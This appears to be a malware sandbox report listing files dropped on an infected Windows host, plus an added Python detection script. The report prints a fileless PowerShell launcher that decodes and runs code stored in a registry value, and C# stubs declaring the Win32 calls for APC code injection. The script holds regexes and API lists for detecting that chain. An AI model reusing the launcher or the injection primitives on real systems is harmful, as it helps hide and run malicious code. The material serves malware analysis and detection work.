                                                          SHA-256:B2A76D43F563B84066B554A64CAC6CCB0A065CCE55C5563F4945534042DCAFA5
                                                          SHA-512:CAEB0D48B51F0F241097B934B027408C53D4A9CDBC6788F21B4110B28FB7A635DD3C75D7CB628D64FD40533A49496DBC00A9F84BCA50A319AA111EFC805F916B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................0.)...................................................... 7............ I............ Q.....P ......`.........f.....j.....p.....|.....................`.!...`...!.`.&...`.......+.....4.1.....7.......I.......Q....................................... ..........<Module>.ebytp2em.dll.yykg.W32.msco
                                                          C:\Users\user\AppData\Local\Temp\ebytp2em.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\hiiw3gsl.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):415
                                                          Entropy (8bit):5.038565598056225
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJ0mMRSR7a18lpP6tkSRa+rVSSRnA/fl81N4IkgsOFQy:V/DTLDfuCMLh6tv9rV5nA/61N43gszy
                                                          MD5:820D67D86E4D2F141C62A2F02F457875
                                                          SHA1:0F597E389BE20591567742E9333D19419947B3CD
                                                          SHA-256:0DECFD511470CAB8EF7D4A45A891B8D3C8A7ABA782190C2777E2A2048F82A3CD
                                                          SHA-512:B05C022573C3EA6D9BC39C6E6E38DD33EC63D55F9793E6F5367E1EBA8493C33FFA28EB5989881EC82EE898F117D616FD1FE2A68E7FBF345209E8A61CBBFCCB61
                                                          Malicious:false
                                                          Reputation:unknown
                                                           Preview (the original preview shows the BOM and each line break as a dot; expanded here):
                                                           using System;
                                                           using System.Runtime.InteropServices;

                                                           namespace W32
                                                           {
                                                               public class nrahxbk
                                                               {
                                                                   [DllImport("kernel32")]
                                                                   public static extern uint QueueUserAPC(IntPtr bjvmnbdtfa,IntPtr tvxroymffj,IntPtr xig);
                                                                   [DllImport("kernel32")]
                                                                   public static extern IntPtr GetCurrentThreadId();
                                                                   [DllImport("kernel32")]
                                                                   public static extern IntPtr OpenThread(uint bbqximxsfm,uint leqlyn,IntPtr axhxmnupohp);
                                                               }
                                                           }
                                                          C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):351
                                                          Entropy (8bit):5.241901715088777
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fYTzxs7+AEszIWXp+N23fY6x:p37Lvkmb6KHgTWZE8gO
                                                          MD5:69A778C5C4BA5BD5D74607FCA057A349
                                                          SHA1:C40A97992D33C9F9E0A4D7FCD0F2D679C7A03CF8
                                                          SHA-256:44A5FC032575EE6A2B6A2E78B1AAC2A33E587462CF1C3AAE902423ED6930154D
                                                          SHA-512:45804C00134BEC8852E78E4A9E59CBB80D4F1E667CA5D2EC24321FC0D13B13F912DBE017311BB1A79BB260A7B9D8822F9EB2FE998F0AAA2673B17BCB3C113D91
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hiiw3gsl.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.632611212353435
                                                          Encrypted:false
                                                          SSDEEP:48:6jm65J7+ikL31uu0SJguaqgX1uleMia3vMJq:r65J7yL3PAIkvKv
                                                          MD5:0186F4FD170148B6038818513C1E0433
                                                          SHA1:B00BE66DE2852FB11DD967F554CE2BB3031DE47B
                                                          SHA-256:5F2170918D15A7A7EA12A6AFF2A7138E938C5FB80FC8D18CBC7B5B67F0446B82
                                                          SHA-512:8C97E2B4F7765112905CB26CC284CD09EC9866EBA082069EDBE9ABF17AACD9E25FC90495644CFCF8478838F549AC9A2C0C09A57860B52F9709C0B2B0E15C4B7A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......H...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................3.,...............)...................................... :............ G............ Z.....P ......e.........k.....v...........................e. ...e...!.e.%...e.......*.....3.<.....:.......G.......Z.......................................#........<Module>.hiiw3gsl.dll.nrahxbk.W32.mscorlib.
                                                          C:\Users\user\AppData\Local\Temp\hiiw3gsl.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\hjljqxud.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):405
                                                          Entropy (8bit):4.989686390677173
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJZMRSRa+eNMjSSRrIdOLaSRHq1rywQeNVaMny:V/DTLDfuP9eg5rIglurywhNUMny
                                                          MD5:5210AC8610DA2A55F963FF2C951D0DC3
                                                          SHA1:A4F391F9661A57D4A40896F31158BB5E445B4269
                                                          SHA-256:53CE49B3F1728B3ABDCE3ECEBC468947EC3C89460B721456CD7BFD297888F877
                                                          SHA-512:9B02B21D978580967C6812DF158124973A6D1A147EFD2CF842F421FD1A44D8525DFD38270C1F500F7010436F41FC1771C983A59C3C3FFBAA18ED8B072DB18870
                                                          Malicious:false
                                                          Reputation:unknown
                                                           Preview (the original preview shows the BOM and each line break as a dot; expanded here):
                                                           using System;
                                                           using System.Runtime.InteropServices;

                                                           namespace W32
                                                           {
                                                               public class yykg
                                                               {
                                                                   [DllImport("kernel32")]
                                                                   public static extern IntPtr GetCurrentProcess();
                                                                   [DllImport("kernel32")]
                                                                   public static extern void SleepEx(uint qsg,uint ocyun);
                                                                   [DllImport("kernel32")]
                                                                   public static extern IntPtr VirtualAllocEx(IntPtr vlrtwububdj,IntPtr fposqe,uint lsohf,uint uoit,uint ktkrnqdoj);
                                                               }
                                                           }
                                                          C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):351
                                                          Entropy (8bit):5.301069111144844
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fX8Vzxs7+AEszIWXp+N23fX8Qn:p37Lvkmb6KHP8VWZE8P8Q
                                                          MD5:0B98006696980210E9096059C632C9B8
                                                          SHA1:BA33540895DF323BB1D30D55441736656F52DD5A
                                                          SHA-256:3E717303B58E2B14894912390DE05081D1807884B29A6C570C69FE8F34AC8FB0
                                                          SHA-512:986EE52DEF241BA94C9D44E5D1CE8DED5DEF73E1CFB6E02841BF15884B1391CDB7E222F8D4178ECCD224787064F6FCD6DE3ECC96AF33A2D09C66975483A2080A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hjljqxud.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hjljqxud.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\hjljqxud.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6196876679200796
                                                          Encrypted:false
                                                          SSDEEP:24:etGSN8+mEej8MTHtmCFxidWptkZfOBvPat60hEdI+ycuZhNUakSgPNnq:6DLjMTwCFxcWkJOlSt66Ed1ulUa34q
                                                          MD5:AB4597E9782631B17D2198E76172A529
                                                          SHA1:F1A1CEB3F77BC49D50D7D19C1BCB735D371F42A4
                                                          SHA-256:4B834FFE906C310F0F47401E4533440FABEE3F0CEC9B9226E8DF0CFAFCC0972A
                                                          SHA-512:A3E2C980FF718E6028215F79235A9C69CBDA0817163F1C98E32F79A6303A28C1A2C434A19F1DB94A5E46D4CC377173D96806A49B728E1C62D2344BB04D9368A6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................0.)...................................................... 7............ I............ Q.....P ......`.........f.....j.....p.....|.....................`.!...`...!.`.&...`.......+.....4.1.....7.......I.......Q....................................... ..........<Module>.hjljqxud.dll.yykg.W32.msco
                                                          C:\Users\user\AppData\Local\Temp\hjljqxud.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\uio4qdnj.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):415
                                                          Entropy (8bit):5.038565598056225
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJ0mMRSR7a18lpP6tkSRa+rVSSRnA/fl81N4IkgsOFQy:V/DTLDfuCMLh6tv9rV5nA/61N43gszy
                                                          MD5:820D67D86E4D2F141C62A2F02F457875
                                                          SHA1:0F597E389BE20591567742E9333D19419947B3CD
                                                          SHA-256:0DECFD511470CAB8EF7D4A45A891B8D3C8A7ABA782190C2777E2A2048F82A3CD
                                                          SHA-512:B05C022573C3EA6D9BC39C6E6E38DD33EC63D55F9793E6F5367E1EBA8493C33FFA28EB5989881EC82EE898F117D616FD1FE2A68E7FBF345209E8A61CBBFCCB61
                                                          Malicious:false
                                                          Reputation:unknown
                                                           Preview (same content as hiiw3gsl.0.cs above, identical hashes; line breaks expanded):
                                                           using System;
                                                           using System.Runtime.InteropServices;

                                                           namespace W32
                                                           {
                                                               public class nrahxbk
                                                               {
                                                                   [DllImport("kernel32")]
                                                                   public static extern uint QueueUserAPC(IntPtr bjvmnbdtfa,IntPtr tvxroymffj,IntPtr xig);
                                                                   [DllImport("kernel32")]
                                                                   public static extern IntPtr GetCurrentThreadId();
                                                                   [DllImport("kernel32")]
                                                                   public static extern IntPtr OpenThread(uint bbqximxsfm,uint leqlyn,IntPtr axhxmnupohp);
                                                               }
                                                           }
                                                          C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):351
                                                          Entropy (8bit):5.268750609128095
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f9KHzxs7+AEszIWXp+N23f9KoyA:p37Lvkmb6KHl0WZE8lz9
                                                          MD5:49F0BD0679BF1D1C64609BEC9FF0E9A8
                                                          SHA1:891088F1D52E4CBA1FC00275C138412B721B3AA9
                                                          SHA-256:4850FD4D357E5351C8262D82A388985B2B2B981B101052EB731D5B5D26BF8A98
                                                          SHA-512:3DCCB541CD36CCD5AC5537E7E3843E158760817BACE3C8BBABF6CF7BAB13CDE2EE95AC1DC3FB4A442FFE855502004AA92246FD912E4E118BA5723AA85E1592DA
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uio4qdnj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uio4qdnj.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\uio4qdnj.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6373866366749064
                                                          Encrypted:false
                                                          SSDEEP:48:6Im65J7+ikLLuu0SJmUqgX1uljua36tq:Q65J7yLhhIpuK6
                                                          MD5:97E33B4529706F244A7CC47FEF8277AE
                                                          SHA1:947DC04DF356F47448FC32D5EE745596473B0F59
                                                          SHA-256:E0C3FB85273C41F45A2A3DF4ADECFBAF8C3A69DA3255A2E3065026F3EFB2CA15
                                                          SHA-512:49366788F7963F742735F04691E4EFC9427CBED09B7B9883B599CFABFBF2E47303B21B2D4D555596334C5D394BAED8289B7DD848798C0F71502AA2263B2A297E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......H...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................3.,...............)...................................... :............ G............ Z.....P ......e.........k.....v...........................e. ...e...!.e.%...e.......*.....3.<.....:.......G.......Z.......................................#........<Module>.uio4qdnj.dll.nrahxbk.W32.mscorlib.
                                                          C:\Users\user\AppData\Local\Temp\uio4qdnj.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\Documents\20211008\PowerShell_transcript.830021.xU5QnXMG.20211008064622.txt
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1195
                                                          Entropy (8bit):5.320686932671721
                                                          Encrypted:false
                                                          SSDEEP:24:BxSAIxvBnD+x2DOXUWOLCHGI4XWrHjeTKKjX4CIym1ZJXWOLCHGI4SnxSAZn:BZcvhKoORF4GrqDYB1ZcF4UZZn
                                                          MD5:8AF4A446FD74F106B3927FD02E153053
                                                          SHA1:0C5A039AC8E3712945A48112494E3209ED7F619A
                                                          SHA-256:29DA2D3F7E72FFC0EAE80A9BE479BFA51450B70D9E0F7EC3B4090A3603E2B1AD
                                                          SHA-512:60EC0EE0ACD4EBD70CDD3BB2277D456169A9DF53A8D0B13855F46F0DB97DEBD13ED9E6B0D738900E7C094CB3F3F210CA1ADDA1E834B08C63996A0953448FCF25
                                                          Malicious:false
                                                          Reputation:unknown
                                                           Preview (CRLF line breaks shown as dots in the original preview; expanded here):
                                                           **********************
                                                           Windows PowerShell transcript start
                                                           Start time: 20211008064622
                                                           Username: computer\user
                                                           RunAs User: computer\user
                                                           Configuration Name:
                                                           Machine: 830021 (Microsoft Windows NT 10.0.17134.0)
                                                           Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))
                                                           Process ID: 5480
                                                           PSVersion: 5.1.17134.1
                                                           PSEdition: Desktop
                                                           PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
                                                           BuildVersion: 10.0.17134.1
                                                           CLRVersion: 4.0.30319.42000
                                                           WSManStackVersion: 3.0
                                                           PSRemotingProtocolVersion: 2.3
                                                           SerializationVersion: 1.1.0.1
                                                           **********************
                                                           **********************
                                                           Command start time: 20211008064622
                                                           **********************
                                                           PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))
                                                           ******************
                                                          C:\Users\user\Documents\20211008\PowerShell_transcript.830021.xd8ptVim.20211008064618.txt
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1195
                                                          Entropy (8bit):5.322193987487182
                                                          Encrypted:false
                                                          SSDEEP:24:BxSAdxvBnD+x2DOXUWOLCHGI4XWetHjeTKKjX4CIym1ZJXPOLCHGI4znxSAZS:BZ/vhKoORF4G8qDYB1Z/F4TZZS
                                                          MD5:8E619B398098C24D77705A3469300C9C
                                                          SHA1:25DFE5320E20672519A43CF9C45E1B8FF38CBD4D
                                                          SHA-256:60B3C46DFE1B6F20597588DA9B4ACB49651019D3CAEBD9015EC86158D392C6E1
                                                          SHA-512:6213A342205E2AB3285F6957EFF5620C1E2EAB02D2E0DFAC335C7833709DB80714DC93E913E451C93797C985D1AF9F8C6FB7BE01EE7A06CB637E6C8FE43175F9
                                                          Malicious:false
                                                          Reputation:unknown
                                                           Preview (CRLF line breaks shown as dots in the original preview; expanded here):
                                                           **********************
                                                           Windows PowerShell transcript start
                                                           Start time: 20211008064618
                                                           Username: computer\user
                                                           RunAs User: computer\user
                                                           Configuration Name:
                                                           Machine: 830021 (Microsoft Windows NT 10.0.17134.0)
                                                           Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))
                                                           Process ID: 6972
                                                           PSVersion: 5.1.17134.1
                                                           PSEdition: Desktop
                                                           PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
                                                           BuildVersion: 10.0.17134.1
                                                           CLRVersion: 4.0.30319.42000
                                                           WSManStackVersion: 3.0
                                                           PSRemotingProtocolVersion: 2.3
                                                           SerializationVersion: 1.1.0.1
                                                           **********************
                                                           **********************
                                                           Command start time: 20211008064618
                                                           **********************
                                                           PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))
                                                           ******************
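The two transcripts above record the launch command: PowerShell reads a value (UtilDiagram) under HKCU:\Software\AppDataLow\Software\Microsoft\{GUID}, decodes its bytes as ASCII and hands the result to iex, so the second stage lives in the registry rather than on disk. The *.0.cs / *.cmdline / *.dll / *.out quadruples in %LOCALAPPDATA%\Temp are what PowerShell's Add-Type leaves behind when it compiles P/Invoke declarations through csc.exe. Read together, the declared imports (GetCurrentProcess with VirtualAllocEx, OpenThread on GetCurrentThreadId, QueueUserAPC, and an alertable SleepEx) are the set needed to run a buffer through a user-mode APC inside the PowerShell process itself; the report lists only the declarations, not the code that calls them, and notably no WriteProcessMemory, which managed code does not need when it fills the buffer itself. The Python below is an added example and not part of the sandbox report. It runs detection logic over constructed process-creation events in the shape of Sysmon Event ID 1 fields (the PowerShell command line is the one the transcripts record; the csc.exe command line and the parent images are constructed in the form Add-Type produces) and over the dropped C# stubs reformatted from the previews. The point it makes is that each stub alone carries only part of the toolkit, so the import check has to aggregate across every stub compiled by the same PowerShell process.

```python
"""Detections for the PowerShell -> Add-Type/csc.exe -> P/Invoke chain in this report.

Added example, not part of the Joe Sandbox report. EVENTS are constructed samples in
the shape of Sysmon Event ID 1 fields; the csc.exe line and the parent images are
constructed, the PowerShell line is the one the transcripts record. The C# stubs are
the dropped *.0.cs sources as shown in the previews, reformatted.
"""
import re

EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",  # constructed, not from the report
     "cmdline": r"powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software"
                r"\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Process"},  # benign control
]

# iex fed from Get-ItemProperty on a registry hive: the stage is stored in the registry.
RE_IEX_REGISTRY = re.compile(
    r"\b(?:iex|invoke-expression)\b.*\bGetString\(.*\b(?:gp|get-itemproperty)\b\s+(?:HKCU|HKLM):",
    re.IGNORECASE)
# csc.exe reading a response file from %LOCALAPPDATA%\Temp: Add-Type's compile step.
RE_CSC_TEMP_CMDLINE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.cmdline", re.IGNORECASE)
# One P/Invoke declaration; group 1 is the imported Win32 function name.
RE_DLLIMPORT = re.compile(r'\[DllImport\("[^"]+"\)\]\s*public\s+static\s+extern\s+\w+\s+(\w+)\s*\(')


def classify_process(event):
    """Return the detection names that fire on one process-creation event."""
    image = event["image"].lower()
    parent = event.get("parent", "").lower()
    hits = []
    if image.endswith("powershell.exe") and RE_IEX_REGISTRY.search(event["cmdline"]):
        hits.append("powershell_iex_code_from_registry")
    if (image.endswith("csc.exe") and parent.endswith("powershell.exe")
            and RE_CSC_TEMP_CMDLINE.search(event["cmdline"])):
        hits.append("csc_compile_from_temp_under_powershell")
    return hits


# The dropped stubs, reformatted from the report previews (parameter names as dropped).
CS_NRAHXBK = """using System; using System.Runtime.InteropServices;
namespace W32 { public class nrahxbk {
  [DllImport("kernel32")] public static extern uint QueueUserAPC(IntPtr bjvmnbdtfa,IntPtr tvxroymffj,IntPtr xig);
  [DllImport("kernel32")] public static extern IntPtr GetCurrentThreadId();
  [DllImport("kernel32")] public static extern IntPtr OpenThread(uint bbqximxsfm,uint leqlyn,IntPtr axhxmnupohp);
} }"""
CS_YYKG = """using System; using System.Runtime.InteropServices;
namespace W32 { public class yykg {
  [DllImport("kernel32")] public static extern IntPtr GetCurrentProcess();
  [DllImport("kernel32")] public static extern void SleepEx(uint qsg,uint ocyun);
  [DllImport("kernel32")] public static extern IntPtr VirtualAllocEx(IntPtr vlrtwububdj,IntPtr fposqe,uint lsohf,uint uoit,uint ktkrnqdoj);
} }"""

# Win32 primitives grouped by the role they play in running a buffer as code.
ALLOC_APIS = {"VirtualAllocEx", "VirtualAlloc", "NtAllocateVirtualMemory"}
WRITE_APIS = {"WriteProcessMemory", "NtWriteVirtualMemory"}
EXEC_APIS = {"QueueUserAPC", "NtQueueApcThread", "CreateRemoteThread", "CreateThread", "SetThreadContext"}
SELF_TARGET_APIS = {"GetCurrentProcess", "GetCurrentThreadId"}


def pinvoke_imports(cs_source):
    """Set of Win32 functions a single Add-Type stub declares."""
    return set(RE_DLLIMPORT.findall(cs_source))


def injection_verdict(sources):
    """Aggregate imports across every stub one PowerShell process compiled, then score them."""
    apis = set()
    for src in sources:
        apis |= pinvoke_imports(src)
    roles = {
        "alloc": sorted(apis & ALLOC_APIS),
        "write": sorted(apis & WRITE_APIS),
        "exec": sorted(apis & EXEC_APIS),
        "self_target": sorted(apis & SELF_TARGET_APIS),
    }
    # Allocation plus an execution primitive suffices; a write primitive is optional
    # because managed code can fill its own buffer (e.g. Marshal.Copy) without one.
    roles["toolkit"] = bool(roles["alloc"]) and bool(roles["exec"])
    return roles


if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["image"].rsplit("\\", 1)[-1], "->", classify_process(ev) or "no hit")
    print("per stub:", injection_verdict([CS_NRAHXBK])["toolkit"], injection_verdict([CS_YYKG])["toolkit"])
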